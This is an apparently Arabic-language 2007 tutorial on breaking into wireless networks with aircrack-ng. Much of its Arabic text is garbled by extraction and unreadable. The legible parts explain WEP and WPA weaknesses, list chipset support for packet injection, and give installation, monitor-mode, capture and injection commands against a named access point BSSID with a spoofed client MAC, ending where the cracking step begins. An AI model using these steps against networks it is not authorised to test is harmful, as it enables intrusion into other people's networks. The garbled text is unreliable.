HOWTO-Hacking Wireless Networks اختراق الشبكات اللاسلكية ,, الوايرلس

http://www.t0010.
com ‫ ا رق ا

و‬
‫א
א א‬
‫ א‬
BrokeN-ProXy
####################### Br0ken r0x######################
# Lesson : Howto Hacking Wireless Networks step by step #
# Author: BrokeN-ProXy #
# Page: www.3asfh.net & www.sniper-sa.com #
# Contact Me 0nly email: br0ken.rlz@gmail.com #
# Msn Messenger : broken-proxy@hotmail.com #
####################### r0x just do it ############### #####
Hacking
Wireless Networks
© Copyright #₪₩~ BrokeN-ProXy #₪₩~ 2007
2
http://www.t0010.com ‫ ا رق ا
و‬
W9:;‫<)א‬:+‫<=אא‬
http://www.3asfh.net/vb/ %&‫*)('א‬
http://www.sniper-sa.com/forums/ +&‫א‬,%*‫*)('א‬
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
+‫=אא‬/8?‫א*@א‬
!"#$‫א א‬
T0010.COM
##-‫א‬./‫א‬0*123(45##
http://www.t0010.com/books/index.php

8!"#$‫א‬+‫א‬67
--------------------------------------------------------------
aLT3rEQ$Hacker
---------------------------------------------------------------
: ',-+ '()*+
‫ق‬I‫ـ‬K 0‫ـ‬,K L+0‫ـ‬MN‫ار ا‬6FG‫ ا‬Adobe Reader /+0123 ‫ام‬6789‫ ا‬:;<= >?@
‫ار‬6‫ـ‬F‫ إ‬2‫ـ‬T] O‫;ـ‬,P8N‫ب و‬0‫ـ‬8SN‫ ا‬OT‫ا‬63 ‫دة‬IWI,N‫ ا‬X3‫وا‬2N‫ ا‬:Y+ O,YZ [SN
: [N08N‫ ا‬X3‫ا‬2N‫ ا‬a<= '‫آ‬2dN‫ ا‬efI+ aN‫ اذه> إ‬/+012^N‫ ه_ا ا‬L+
http://www.adobe.com/uk/products/acrobat/readstep2.html
3
و‬
W+‫ ('א‬
٥KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK WARNING(=A
٦KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKEF‫'א‬D‫א‬1)
EWLANFEF‫'א‬D‫ א‬
J(-‫א‬K(&
EF‫א‬N7$‫ @'א‬L‫!א‬M
١٣KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKEF‫'א‬D‫א‬OD
Wired Equivalent PrivacyN5
Wi-Fi Protected AccessN5
١٥KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKJ(‫אאא‬#Z‫[א‬V)Y*EX‫"א'א‬RS‫"א‬TUVWS‫א‬
6V\F
١٧KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK aircrack-ng]!5
١٨KKKKKKKKKKKKKKKKKKK‫_א‬Oa5V*)!È"_‫)א‬Wwireless tools 5
١٩KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKcX‫'א‬D‫א‬45d3e
٢٠KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK[ Monitor Mode]R-‫א‬9:'‫א‬4(A
٢٢KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKThe attack method 19"S‫א‬ij/‫(א‬k
٢٦KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKThe attack method 2!a‫א‬ij/‫(א‬k
٣٢KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKlm‫א‬
4
و‬
WARNINGKKKKK(=A
KK0*1o*‫אא‬pS‫"א‬+‫<=אא‬i‫)א‬YE‫;א‬E
‫א‬MX"n8Z‫א‬,6-‫א‬8!‫א‬Z:

Dq0q6&()W("T)t"OY06&()W(()"uvFEHackingq‫א‬rMsp"MrM)(M"
q (uSq /‫}א‬qqM$qq!MFFqq{qq (|=qq‫א‬N"S‫א‬Lqq*‫א‬qqrqq!rMzqq*lM،(ZwqqxuS‫א‬q :"
q&‫א‬Dq![_q"'‫=א‬q‫)|א‬qA"q*S‫א'א‬q~a‫א‬Rq:"q6\!S‫א‬qq(‫א‬/‫}<=א‬M!MKK,6-‫א‬
EE,6-‫א‬+@,e&-‫"א‬

W+‫<=אא‬r"0!&[(4_‫@)א‬r
‫{א‬e)&+‫<=אא‬WZM)"

KWirelessq‫א‬EF‫'א‬D‫אא‬#Z$_&WW_$"M
K8‫ א‬p‫"א‬S,6V-‫'"א‬D‫א‬8E‫)א‬W_ !
EF‫'א‬D‫)א‬mTR"U-‫'א‬5D‫"א‬،![‫'א‬F+3%M‫א‬6&W_a
K43*<)W($"V‫א‬#Z‫א‬6‫א‬V@rM

'5Dq‫א‬q5rw‫א‬.5q/‫א‬q<JqM4~Dq‫א‬q6\!M[T)qW‫א‬-‫~א'א‬a‫"א‬K&‫!*א‬
K*S‫א‬V6\!"V@K&p!KDVr*&('&-‫[*א‬

zq*lMq5"qY-‫א‬4~Dq‫א‬q\!q "]‫א‬q‫א‬q5 [O54e0.5/‫א‬17Z
Vqq @"V&‫א‬qq qq (6Vqq !M(qq Tqq ~-‫א‬v""|)qq 3‫א‬3qq (rM,6qq -‫א‬+qq @q q
K&‫"א‬FE‫א‬N")‫א*"א [א‬j1 eR[6<-‫"א‬

5
و‬
EF‫'א‬D‫א‬1)
WEWLANFEF‫'א‬D‫א‬
q6‫א‬Fqq<"q&‫א‬5qSzq")((r|M[4*‫א‬dYD‫א‬rrw‫א‬ s%M

0qq (qq !#!$‫[א‬s7qq ‫"א‬8qq !"#‫)א‬qq (‫א‬zqq ("M4qq E(rM qq (4qq ‫א‬5|Mr")qq "Nqq 6‫א‬
qq‫'א‬qq1'Fqq‫א‬NFqqZ0qq!-‫א‬r‫א‬Oqqk5qq@'‫א‬tqqkqqzqq1(eqq-‫א‬rqqsqq%M"qq5
K!#!$N7FN6‫א‬i‫)א‬YE‫א‬8kS‫א‬
WLAN \wireless local FqEF‫א‬q‫'א‬q qDq‫א‬8q<"T)()‫א*א‬4‫=א‬q q<4q q5"

radio Fq q(R‫אא‬Tqq @:qq 1qq !#!$‫א‬Dqq N7qq $qq *‫=א‬qq <s6qq "Earea network
KFES‫א‬1N7$‫א‬$)Efrequency/RF
8qEF‫*אא‬i‫)א‬YE‫א‬VedYD‫( א‬X‫א‬5S‫א‬1T18Ve*Z‫א*א‬M

٢٠٠٥iqq1Nqqqq&‫;א‬qqM qq[`$w‫'א‬qq9:*Zqq‫א‬qq*‫א‬R)qq14q %")qq"Kqq!#!$
WN7F,t(7*1z1*Z‫)*א*א‬6&"
6
و‬
Ewireless computer cardsFEF‫א‬6‫ 'א‬J١
q ‫=א‬q<|qA"0epr)"MZ.VW|M"MN6‫א‬.VTRWr)"

K8WZ"M8Z‫א‬R8t‫<א‬z1
W8EF‫"'א‬5L‫!א‬M
01!6‫א‬TUVW8E$'5
-‫א‬TUVW8E$'5
PCMCIA
USB01!6‫"א‬-‫א‬TUVW8E$'5

.V‫)] א‬8E$'5V)W(*(#*EeN6‫א‬TUVWM8qeW\F
7
و‬
WEaccess pointFN%‫ ! א‬J٢
*ZqE!z1|AX‫א'א‬t *MK!#!$‫א‬DEF‫'אא‬D‫א‬47

Dq07qq%Z1*q%q6Tt ‫א‬Z8t‫<א‬1N%‫! א‬D4e
. 0pMNE‫ 'א‬1
+‫<=אא‬8qeV( 5(kvDi!È"

8
و‬
J(-‫א‬K(&
rqqe،q /Dqq!$‫ א‬qqE‫"א‬qq‫א‬qq1R"،q Ve‫א‬qq)qq5‫"א‬،qqEF‫' א‬qq*‫א‬KqqqqY

W4a'En
Institute of Electrical and Electronics Engineers (IEEE)
Internet Engineering Task Force (IETF)
Wireless Ethernet Compatibility Alliance (WECA)
International Telecommunication Union (ITU)
4q!q5Kq(& IEEE 4q6&‫'א‬q16iqF

_ a،J(-‫ )א‬tRVWT)&#D
Kq5"Eq S‫א‬qA;q‫"א‬Mq((R‫'א‬qWi‫)א‬YqE‫א;א‬qE،،F
_ aqFqZ9:.qVW q'&-‫א‬
K'$7FNE‫א‬E"i‫)א‬YE‫א‬z"
q *‫א‬q1"،q ‫א‬T‫א‬RqqV IEEE 4a'Enre ،EF‫'א‬D‫א‬J(( ;*M

. EF‫א‬N7$‫'א‬DT)(exZM ("،rS‫"א‬،|RR#‫א‬
9
و‬
EF‫א‬N7$‫ @'א‬L‫!א‬M
Xq‫'א‬eq-‫א‬9:_‫א‬R*qE‫א‬q¡L‫א‬q!M6qpqEF‫' א‬Dq‫א‬K*7q ،‫'א‬D‫א‬4a

.EF‫'א‬D‫א‬L‫!א‬ML!451 T=**E"<1 '!‫א‬NE:E
W (WWAN) *‫&א‬E‫"א‬EF‫א‬N7$‫@'א‬K١
"MT)q&‫א‬q&‫'א‬Dq‫ א‬q1qE$'$7q‫א‬JqEq,)Yq-‫ א‬WWAN 'q*q¢l

K%m‫'א‬D‫א‬
q‫א‬-‫א‬i‫)א‬YE‫א‬NFZN")‫"א‬r)-‫א‬4a،&E‫"א‬e‫~א‬W {k*1'$7$‫<=א‬i‫)א‬YE‫א‬ "
KEF‫)א‬m‫|א‬e4Te-‫א‬1*7‫א‬6S‫א‬6\!M "M't‫א‬/‫א‬TR)&
Global 8!qa‫א‬4q‫א‬q6\!M6qE2GF8!a‫א‬4‫א‬6\!‫ א‬WWAN '*`&£

Cellular Digital Packet "،System for Mobile Communications (GSM)
Code Division Multiple Access (CDMA). "،Data (CDPD)
TR")qN¤qoq!:Vq&cq Xq‫"א‬،8!qa‫א‬4‫ א‬N7‫@'א‬N!FRV‫א‬e

9:ep_61_E EX‫א‬2a‫א‬4‫*'א‬9:،V&, {e‫אא‬i)19:ep
. 2a‫א‬4j861}( D* ITU ¤jDK&‫א‬NN¤j‫!א‬: Oe
W Wireless metropolitan area networks ( WMAN

) K٢
q *6qpTR)q& q‫א‬,q qE$'$7q‫א‬JqEq,)Yq-‫ א‬WMAN 'q*q¢l

r")qE -‫א‬4ai1r["M8&Wi6p "M*&*()[¥rT)1,_FaF!)
K m‫א‬OW"E3*‫'א‬F‫"א‬Mt‫` א‬S‫'א‬F5)-&‫אא‬
[cqu"،q‫א‬N7q$‫'א‬Dq1)q54q6& rM WMAN 'Dqq ،cqu9:eqp

K‫ א‬N7$‫א‬DTWn-‫ א‬m‫א‬4 &
10
و‬
zq1q ‫א‬R‫א‬RUq("'q!‫ א‬4q*;‫א‬q6‫א‬qA&@S‫"א‬M((R‫אאא‬S‫ א‬WMAN '@i)Y

K1'1!#!:9:N%‫א‬,)Y6 eX‫(א* "א‬1EF‫א‬N7$‫@'א‬
multichannel multipoint distribution service 4qa،q¡'q*i‫)א‬YqE‫א‬q

4q61q166، local multipoint distribution services (LMDS)"(MMDS)
=q<(q )q'q%‫א‬-‫(א‬q [q *‫(א‬q18qEF‫ א‬Nq%‫א‬J(q-IEEE 802.16
. '*‫א‬
W (WLAN)‫א‬EF‫א‬N7$‫@'א‬K٣
4qEzq1Fqq * 6qpqE$'$7q‫א‬JqEq,)Yq-‫ א‬WLAN 'q*ql

KE 4ai1r["M،5@"Mz*6p،Na-‫א‬
q5q5rq2qxqZM5qM["Mqn-‫א‬q-‫ [א‬WLAN 'q@i‫)א‬YqE‫ א‬q

[4q6&‫ א‬qr)Yq-‫א‬6q(zqTRqW LAN q@9:eqp"M،_ q!TOq5'Fq‫א‬
K¡'"M[";*‫א‬6p¡ ‫א‬
4q6&‫'א‬q 47qqEES‫ א‬WLAN 'q@[K,(q 4q6&rM WLAN 'Dqq

8qEF‫א‬Nq%‫א‬q! qEqWZiRqTUqVWM"Mq((R‫א‬N7q‫א‬q@ ' TUVWMFEF‫א‬
9:Oq\!Lq!q WLAN 'q@[KDqEES‫"א*א‬46&‫ 'א‬, j546&X‫א‬
KO\!
r"R qqnN7qq‫א‬qq@‫א‬Dqq(rM،'‫א‬lnqqqq14qqa،TR")qqqq *[,)YqqT)qq&qq

.D‫א‬R‫א‬9:N%¥L‫א‬R*<(‫א‬u:،N%"!i‫)א‬YE‫א‬
'q!‫א‬4q!1qER)q§|=‫"א‬،WLAN 'D٨٠٢{١١}z1 IEEE R%، 1997i1[

q(، q-‫) א‬q()‫}א‬q-‫א‬0q!5"")q(|=q‫א‬٨٠٢{١١b}q6_qe"Kq!a~٢9: ١
KU<~W ٢{٤RR#‫א‬z1!a~١١<)x71'!‫א‬4!
zq1q!aqq~ ٥٤<)qx7q1'!‫א‬4!R)§|=‫א‬،٨٠٢{١١a<Z)()W}

.U<~W٥RR#‫א‬

11
و‬
WWireless personal area networks ( WPAN

) K٤
، PDA4qqaFTUqqVWqqe5qqE$'$7qq‫א‬JqqE qq,)Yqq-‫ א‬WPAN 'qq*qql

;q‫( א‬POS) 87qYD‫א‬46&‫;א‬e6pT)W‫א‬-‫א‬E6‫א‬6‫ א‬TUVWM"M،(m‫א‬K‫א‬/‫א‬
KM١٠ezi)Y-§|=‫<א; א‬POS
8q< Bluetooth q*K;‫א‬q6‫א‬qA&@S‫ "א‬Bluetooth 8<EES‫ א‬WPAN '* _

K_ )٣٠z'e9:'!‫א‬4*((R‫אאא‬S‫ א‬i)Y4()*
q Bluetooth q*(q q("qt‫"א‬+q‫"א‬r‫)א‬q‫א‬q1 Bluetooth 'q!4!

Xq‫א‬، Bluetooth Special Interest Group (SIG)z6qq*‫=א‬qVq6V q164q
_‫)א‬W O~% !6pTUVWS‫א‬4%،4()4DK١٩٩٩i1١{٠‫)א‬%‫ א‬Bluetooth '%‫' א‬D!
. ;‫א‬6‫א‬A&@S'k‫;א‬D!:,)Y6 ،E4M"M#١F
iq WPAN 'Dq٨٠٢{١٥4q6&‫א‬q16 IEEE qEM، WPAN'q*(q )q

1.0. ‫)א‬q%‫ א‬Bluetooth 'q%‫א‬9:_‫א‬R*qE‫א‬، WPANJ(q(q =q<4q6&‫א‬q16
4~Dqq‫א‬qq!: ،qq ‫א‬FVqqE‫א‬qq©،)qq&‫א‬qq©8qq<J(qq-‫=א‬qq/qqt‫)א`א‬qq<S‫א‬
.٨٠٢{١١N7‫{ @'א‬e‫"אא‬،NR-‫א‬
W)7-‫א‬
W8‫אאא‬z1~p‫()א‬U6TeT_TaTW("R<+1
http://www.arabhardware.net/forum/showthread.php?t=27438&highlight=WLAN
qpMLqp-‫ א‬qKqpM"3p‫א‬7‫&א‬WRM"Lp-‫א‬z1)1
K0WÈ|=‫א‬e
12
و‬
EF‫'א‬D‫א‬OqD
WEP , WPA q6<"EF‫'א‬D‫א‬OD)Y-‫'א‬$5‫א‬,1!_()W(
KK476V*1!È"
WWired Equivalent PrivacyN5 J١
c=qq،qq*S‫א‬kqqY-‫א‬qqVW‫[א‬qqEF‫'א‬Dqq‫@א‬Dqq<IEEE)qqV&[raqq‫א‬RM
q‫'א‬Dqqe-‫א‬%7qm‫א‬qE‫א‬0q1qkMq( Nq5"67/‫<=א‬
KWEP+$`1|=‫"א‬EWired Equivalent PrivacyF
{qq A"'qq &-‫א‬ODqq RC4z1)qq ODqq qq .‫א‬Zzqq 10qq *[WEPNqq 5")qq 61‫א‬
qq5.5Vqqqq TOqq ZTqq~0qqeKDqq5‫א‬zqqF(qqkNqq5"‫=אא‬qq<i)qq(،%7qqm‫א‬
K (E4DT~a‫א‬v@‫`א‬E" bit ١٢٨"M 64 bit )Y-‫א‬OD‫א‬T1\*‫~א‬0(
8q<"RC4L!bit٢٤ODT<IVq‫א‬IV[Initialization Vector ][RWT~a‫א‬

q(q&(IVqqe5q65 q6oqR‫=אא‬/"OR 128٦٤)YE‫א;א‬E
K8r9:IVKM٥٠٠,
qqE5qq<"$:{tqqR١٠=qqZ(q ‫א‬qq‫א‬rMqqW)qq‫א‬qq٢٤cqq!rM qq!cqqu)qq&

rDqq1bit٦٤"bit١٢٨q q‫א‬0qq5vqq@‫`א‬qqEqq5M4DqqT7qq‫א‬sqqrM4qqWMqq"<ODqq
Ki)Yª"V(0re&
q٢٤q<"IVq<8!qa‫א‬Uq‫"א‬RC4Lq!١٠٤ODN"S‫;א‬U‫א‬,tUW0!١٢٨q‫א‬

N"S‫א‬,tUqWqrqiFq‫א‬Jq!q٦٤q q*q:"q١٢٨ODqzq17qV&‫א‬u:
qq٦٤zqq147qqAv‫א‬Vqq&‫א‬u:qq٢٤qq<"IVqq<8!qqa‫;א‬Uqq‫"א‬RC4Lqq!qqqq٤٠ODqq
WEPr$WPAz1WEPi‫)א‬YE‫א‬4(}*‫אא‬V-‫א‬،WEP header[05iF<
KEF‫א‬D‫א‬z1O¬FO&(D‫( «א‬
13
و‬
WWi-Fi Protected AccessN5 J٢
WEPq!58‫*א‬S‫א‬D-‫א‬4٢٠٠٣i1N5‫<=אא‬V
"q(63,qE"q( ‫=א‬q<1)q"Wi-Fi Protected Accessq 7qZ‫א‬8q<WPA
W 6<
WPA with RADIUS
*q"eOqEJ()q(‫{א‬q(kq1,)Yq-‫{ <('א‬3‫[א‬R61$‫א‬r(( ‫[<=א‬
K4(kv@9:§0!Sm‫<=א א‬1sp‫"א‬vD‫א‬R)7
WPA with PSK [pre shared key]

"M`q٦٣9:٨qqVeMR)q10q65|M`q&!rM !"$6&E‫א‬a5S‫א‬8<( ‫"<=א‬
K Hexadecimal٦٤

=qq <z6qq "qq V‫א‬#Z‫&א‬7qq ‫א‬qq sqq %M2qq _‫)א‬qq &qq a5M'qq .‫א‬ZN6&qq E‫)א‬qq "
4DqXq‫"א‬Temporal Key Integrity Protocolqq7qZ‫א‬8q<" TKIP q.‫א‬m‫א‬
Ki)Yqq-‫א‬4qqqqRqqE‫א‬i‫)א‬YqqE‫ א‬q E‫א‬i)Yqq4qqODqq‫א‬sqqOqq~qq(6qq
K0( 54V‫א‬8"i)Y4<"IV(k"WEP4a

ARP 4q61 q*- qp"|=q‫"א‬Message Integrity Code4qaxqZM'*qA9:ep
‫=א‬q<"WEPN‫א‬i)YqqE$q@RqW"0q[0q rq8q‫"א‬Replay Attack
_ q(Mcq!M9:eqpLEM4DD‫ (א‬c8"IV 061L(ij/‫א‬
R)qq&‫ א‬qq6o)qqqq&(4~Dqq()qqMqqVeqqDqq‫א‬r:qq[iqqj/‫=אא‬q<i)YqqrM qq
cqe‫א‬0qerq(i.$IV q6o)q(q*5‫א‬u:i.$0q!S4~Dq"Dq‫א‬cq"IV+ -‫א‬
KEF‫א‬D*(J5S‫"א‬.V‫א‬,8D )1

V( 5r&!<+‫؟؟"אא‬V( 5r4<,‫א‬WPAq W!V-‫א‬
Dq(RqW-‫א‬47qq&(Deauthentication Attackz6q(iqj<i‫)א‬YqE‫ א‬qE‫א‬
qqEF‫א‬Dqi)Yqq-‫א‬NqZRqq61q)qqrDq1qq!TqrDqq(Vq©"qEF‫א‬
5qq/‫)<א‬qq&qq*(Jqq5S‫"א‬i)Yq-‫א‬,qqODqq‫א‬sqqNRqqqqVeqq(Xq‫א‬qq\3‫א‬8qq<"
q6N"q§q&(brute force attack0q?‫א‬iqj<i‫)א‬YqE‫ א‬qE‫א‬ODq‫א‬cq(N"q§
q&()Yq-‫א‬RqE‫א‬Tz1)6&(ij/<v®"D‫א‬OD)Y-‫א‬RE‫א‬
KVz1V(0!‫א‬O5N6‫!'א‬Z٨RE‫א‬u:
14
و‬
J(‫אאא‬#Z‫[א‬V)Y!ÈX‫"א'א‬RS‫"א‬TUVWS‫א‬
KJ*i\!015N665.VW K١
Aircrack Tools {e‫א‬8E$'5 K٢
Aircrack-ng Tools K٣
aircrack-ng {e‫ א‬8E$'5 5N6.VW

tools aircrack tools J*i\!01
6V\F
ct‫א‬q@)q*1=qq5c=qAircrack ]q!zq146&qEJ(‫'"א‬545Je0!‫א‬

KJ*1)(cu9:ep:]!‫א‬1)(0!M;‫@א‬4)5rM"'

'5Dqq‫א‬qq¯‫א‬K NETGEAR Or Linksys xqqE5Dq‫א‬qqE‫א‬qqVq{qqe‫א‬q*
4qq<R)qqA`qqEXqq‫א‬8qq<rS_‫)א‬qqWqq6V§Dqq‫א‬Lqq!qq&![Chipset]§Dqq‫א‬Lqq!qq6<MqqW)
K$iM]!‫א‬1)
]qq!‫ א‬qzqq1;q*iFq‫=אא‬qq<"Atheros8q<J*qq1)q"]q!‫א‬1)qq§q@4qeM
www.aircrack-ng.org
The best chipset nowadays is Atheros. It is very well supported under

Linux, and also under Windows (PCMCIA/CardBus only). Neither
support any USB wireless devices. The latest madwifi-ng patch makes
it possible to inject raw 802.11 packets in either in Managed and
Monitor mode at arbitrary b/g speeds.
15
و‬
qq‫א‬Lqq!46Dq("[]qq!‫ א‬qqquZqN")qq‫]]א‬q!‫ א‬qqqe‫א‬-‫"'א‬qq‫א‬,q(N")qqW‫=א‬q<

KJ*aireplay _(M"J*".")*(airodump1R"chipset
Supported by
Supported by Supported by aireplay
Chipset airodump for
airodump for Linux for Linux
Windows
CardBus: YES
YES (driver patching
Atheros PCI: NO (see YES
required)
CommView)
802.11b YES
Atmel UNTESTED UNTESTED
802.11g UNTESTED
Old models only IN PROGRESS (Forum
Broadcom YES
(BRCM driver) thread)
PARTIAL
(ipw2100 driver
Centrino b NO NO
doesn’t discard
corrupted packets)
NO (firmware drops
Centrino b/g NO YES most packets)
ipw2200inject
NO (See this thread
Centrino a/b/g NO YES for alpha injection
support.)
Cisco Aironet YES? YES NO (firmware issue)
NO (firmware corrupts
Hermes I YES YES
the MAC header)
NdisWrapper N/A Never Never
YES (PCI and CardBus
Prism2/3 NO YES only, driver patching
required)
FullMAC: YES YES (driver patching
PrismGT YES
SoftMAC: NOT YET recommended)
YES, see rt2500,
rt2570, rt61 and rt73.
YES (rt2500 / rt2570 / Also see Ralink
Ralink NO
rt61 / rt73 driver) chipset comments
later on this pager for
important concerns
UNSTABLE (driver
RTL8180 YES YES
patching required)
recommended for
RTL8187L UNTESTED required to view
injection and required
power levels)
to view power levels)
TI YES (driver patching
NO YES
(ACX100/ACX111) required)
Partially (See patch
ZyDAS 1201 NO YES
for details)
ZyDAS 1211[B] NO YES YES
Others (Marvel...) NO UNKNOWN NO
16
و‬
Aircrack]!5
La‫ 'א‬
kernel headers
gcc
8q‫"א‬qV5(q 0&(.±m‫א‬iU‫")(א‬V58‫(&א‬.‫א‬z1dY@45_ &k

Debianzq1q*q&(.|M,5q
W8‫א‬S‫"א"(א‬S‫ א‬Es([Ubuntu , Xubuntu , Knoppix ]
sudo apt-get install build-essential
W8‫א א‬KK]!‫א‬5#8!rw‫א‬
wget http://download.aircrack-ng.org/aircrack-ng-0.9.1.tar.gz
tar -zxvf aircrack-ng-0.9.1.tar.gz
cd aircrack-ng-0.9.1
make
make install
)7-‫א‬a‫(א‬kKKJ*,)Y)*1e"&8<"‫)_א‬WVE]!‫א‬a(k
K_(J*]‫א‬e5 )Y"
17
و‬
‫_א‬Oa5V*)!È"_‫)א‬Wwireless tools 5
wgetSU‫א‬3!
wget http://pcmcia-
cs.sourceforge.net/ftp/contrib/wireless_tools.28.tar.gz
tarS0 ~pc!
tar xvfz wireless_tools.28.tar.gz
cd S)z14Z)!~‫א‬ce)&
cd wireless_tools.28
makeS‫! {א‬
make
make install S]!‫א‬7*i!
make install
q V*TOaqq5qq‫"א‬M{qq T‫א‬RS‫=א‬qq<qq1 qqcqq!M2qqJ(‫א‬qq‫א‬Uqqqq5#qq*6‫=א‬qq<"

KEV@R)7*FOa‫"א‬iwlist "iwconfig
18
و‬
cX‫'א‬D‫א‬45d3e
scan all network around
4q4qvq@|=q‫א‬wireless tools q‫א‬q5rMqFiwlist qS‫א‬i)Yq!`qE

ES‫א‬i‫)א‬YE‫ א‬
bt ~ # iwlist ath0 scan

ath0 Scan completed :
Cell 01 - Address: 00:14:7F:1F:27:6D
ESSID:"SpeedTouch433793"
Mode:Master
Frequency:2.462 GHz (Channel 11)
Quality=60/94 Signal level=-35 dBm Noise level=-95 dBm
Encryption key:on
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9 Mb/s
12 Mb/s; 48 Mb/s
Extra:bcn_int=100
Extra:wme_ie=dd180050f2020101880003a4000027a4000042435e0062322
f00
Cell 02 - Address: 00:18:39:24:5C:F8
ESSID:"linksys"
Mode:Master
Frequency:2.427 GHz (Channel 4)
Quality=50/94 Signal level=-45 dBm Noise level=-95 dBm
Encryption key:off
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
48 Mb/s; 54 Mb/s
Extra:bcn_int=100
Extra:wme_ie=dd180050f2020101030003a4000027a4000042435e0062322
f00
'R)"6O!a‫"א‬6T)‫"א‬,@23‫א‬j! kz1S‫[א‬sp‫<"א‬65
Kr‫א‬S6V-‫&'א‬-‫א‬
19
و‬
[ Monitor Mode ]R-‫א‬9:'‫א‬4(A
N;ÈMonitorR-‫א‬9:c54(Ac1AircrackUi‫)א‬YE‫א);[א‬4
K,5"(‫א؟‬u-
،Monitor mode zq1'q‫א‬rq(i.$ sniffing |q"'qj5‫א‬q)qrD1+‫"אא‬
*(J5SN7$±ZR-‫<=אא‬ManagedR-‫א‬z1r(v‫א‬.V‫א'[א‬cDN"M

WMonitor Modeq'54(3,(k)W(
Kcommand line{(k1W9"S‫א (א‬
AircrackU 8airmon-ng z6U{(k1W!a‫א (א‬
K_E!5u4aManaged R-‫א‬z1r(v‫א'א‬cDN"M
bt ~ # iwconfig ath0
ath0 IEEE 802.11b ESSID:"" Nickname:""
Mode:Managed Channel:0 Access Point: Not-Associated
Bit Rate:0 kb/s Tx-Power:31 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-98 dBm Noise level=-98 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Monitor Modeq'‫א‬4(3,( ‫א‬vDiMÈrw‫א‬

W9"S‫א (א‬
،،،8&‫&א‬command line {(k1
bt ~ # ifconfig ath0 down

bt ~ # wlanconfig ath0 destroy
bt ~ # wlanconfig ath0 create wlandev wifi0 wlanmode monitor
ath0
bt ~ # ifconfig ath0 up
ath0 IEEE 802.11b ESSID:"" Nickname:""
Mode:Monitor Frequency:2.412 GHz Access Point: 00:0F:B5:EA:2F:AF
20
و‬

Encryption key:off
W!a‫א (א‬
،،8&‫&א‬AircrackU 8airmon-ng z6U{(k1

bt ~ # airmon-ng stop ath0
Interface Chipset Driver
wifi0 Atheros madwifi-ng

eth0 Centrino b/g ipw2200
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
bt ~ # airmon-ng start wifi0
Interface Chipset Driver
wifi0 Atheros madwifi-ng

eth0 Centrino b/g ipw2200
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode
enabled)
ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.457 GHz Access Point: Not-Associated
Encryption key:off
WWWWij/‫א‬k
‫א‬5z1M)*Erw‫א‬WWWW
21
و‬
The attack method 19"S‫א‬ij/‫(א‬k
_(M"MonitorR-‫א‬z1'‫א‬r(rMij/‫(א‬k[M)rM4
KV‫א‬#Z‫()א‬X‫א‬J(‫@אא‬R)rrM
*(J5S‫א‬z1c@*(F50er()*1ij/‫<=אא‬i)Y!
Kinteractive ij/‫<=אא‬z6("
W8‫א‬u6*‫א‬NFZij/‫<=אא‬4@"Tesp6
0qqe"qq*(Jqq5S‫א‬zqq1cqq@+qq+$.qqVW)qqW(KKFqq1M83qqp‫א‬4Dqq‫*[א‬qq@qq4qqa

arp 'qqk4qqE!v‫א‬،#qqY-‫א‬.qqVWqqZw‫א‬+qqF‫"א‬،4qq"MOaqq5xqqEqq*6V(qqqqcqqe‫א‬
qq )qq qq 5M qq 6®"ivs)qq (U!rDqq 147qq -‫א‬qq *(F‫{א‬qq (kqq 1qq *(Jqq 5S‫א‬9:request
٢٥٠{٠٠٠_q(qqAv‫א‬64 bitTqqODqq‫א‬rqqqq&‫ א‬qqODqq‫א‬cqq!)qq!rDqq1qq5‫א‬
K05 ٥٠٠{٠٠٠_(A128 bitTOD‫"א‬،0q5

22
و‬
airodump-ng – capture packets

aireplay-ng - interactive attack modes [ injection packets]
aircrack-ng – crack WEP , WPA
(١) airodump-ng
K[V\"5‫`!א‬EU‫({<=|א‬k1
airodump-ng –c 11 –-bssid 00:14:7F:1F:27:6D –w capture ath0
-c : channel number
--bssid : MAC Address for Access Point
-w : save the file
capture : file name that be save the packet
ath0 : our interface name
23
و‬
(٢) aireplay-ng Interactive
interactivez6(ij<i)Y*E"'!‫א‬i!ÈU‫({<=|א‬q q qk1
aireplay-ng --interactive –b 00:14:7F:1F:27:6D –d FF:FF:FF:FF:FF:FF –m 68 –n

68 –p 0841 –h 00:13:CE:6D:61:59 ath0
--interactive : attack modes

-b : MAC Address for Access Point
-d : Destination MAC Broadcast
-m 68 : minimum Packet length
-n 68 : maximum Packet length
-p 0841 : Sets the frame control
-h : MAC Address for Client
24
و‬
(3) increase the packets

`qqEE٢FqqTq m‫{א‬qq )qq&"_‫)א‬qWqqqq!5q5‫א‬E١FqqTqq m‫<)![א‬q@qq4qa
K6R(R.‫[א‬5‫<)א‬D
(4) aircrack-ng
OD‫א‬i!ÈU‫({<=|א‬k1
